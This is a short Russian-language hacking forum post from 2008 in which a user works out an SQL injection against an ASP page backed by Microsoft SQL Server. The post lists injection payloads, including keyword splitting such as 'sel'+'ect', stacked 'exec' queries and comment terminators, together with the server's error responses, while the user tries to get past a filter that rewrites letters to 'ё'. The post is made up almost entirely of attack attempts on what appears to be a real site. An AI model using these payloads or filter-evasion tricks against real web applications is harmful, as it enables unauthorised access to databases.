04.07.2008, 12:24
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
так ведь, дык не вырезается а заменяет на ё
Dima-k17
отвечает:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near 'ect'.
/event_detail.asp, line 44
обрамляем скобками и видим что не нравится:
1 or 1=(["sel"+"ect" db_name()])--
Microsoft OLE DB Provider for SQL Server error '80040e14'
Invalid column name '"sel" "ect" db_name()'.
/event_detail.asp, line 44
т.е. при таком запросе просто отбрасывает sel
если пробовать так:
4696; exec (select db_name())--
то ответ:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near 'ex'.
/event_detail.asp, line 44
подставляем скобки:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near 'exëc (selëct db_name())'.
/event_detail.asp, line 44
|
|
|